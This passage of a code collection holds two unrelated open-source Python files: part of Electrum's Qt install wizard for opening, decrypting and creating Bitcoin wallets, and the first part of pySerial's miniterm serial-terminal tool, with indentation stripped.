wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
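# Sketch of the convention the decorator relies on (illustrative, not a real
# dialog from this file): a decorated dialog gathers user input and returns it;
# func_wrapper forwards the return value(s) to run_next, the next wizard step.
#   @wizard_dialog
#   def my_dialog(self, run_next):
#       value = ...  # collect input via exec_layout(...)
#       return value  # passed on as run_next(value)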
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Needed for Qt on macOS. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
if filename:
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
else:
msg = ''  # do not gettext-translate the empty string: _('') returns catalog metadata
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True, focused_widget=None):
self.set_layout(layout, title, next_enabled)
if focused_widget:
focused_widget.setFocus()
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi, config=self.config)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(
title=message,
is_seed=is_seed,
options=options,
parent=self,
config=self.config,
)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(
seed=seed_text,
title=title,
msg=True,
options=['ext'],
config=self.config,
)
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
pw_layout = PasswordLayout(
msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
pw_layout.encrypt_cb.setChecked(True)
try:
self.exec_layout(pw_layout.layout(), focused_widget=pw_layout.new_pw)
return pw_layout.new_password(), pw_layout.encrypt_cb.isChecked()
finally:
pw_layout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
hide_choices: bool = False,
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None,
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
if not hide_choices:
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(
xpub,
title=msg,
icon=False,
for_seed_words=False,
config=self.config,
)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network: 'Network'):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
miniterm.py
|
#!/usr/bin/env python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
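# For example, key_description('\x03') returns 'Ctrl+C' and
# key_description('a') returns "'a'".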
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
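    # Usage sketch (mirrors handle_menu_key further below): temporarily
    # restore the normal terminal to read a full line of user input:
    #   with self.console:
    #       filename = sys.stdin.readline().rstrip('\r\n')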
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
            elif z in (unichr(0), unichr(0x0e)): # function keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import select
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
# an additional pipe is used in getkey, so that the cancel method
# can abort the waiting getkey method
self.pipe_r, self.pipe_w = os.pipe()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
ready, _, _ = select.select([self.enc_stdin, self.pipe_r], [], [], None)
if self.pipe_r in ready:
os.read(self.pipe_r, 1)
return
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
os.write(self.pipe_w, b"x")
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
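# A hedged example of combining these (Miniterm is defined further below):
#   miniterm = Miniterm(serial_instance, eol='cr', filters=['debug'])
# instantiates the CR end-of-line transform plus DebugIO tracing; main()
# falls back to the 'default' (NoTerminal) filter when none is given.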
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
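        # Note: tx applies the EOL transform first and the filters after it,
        # in the order given; rx applies the same instances in reverse, so
        # the EOL mapping is undone last on received data.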
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
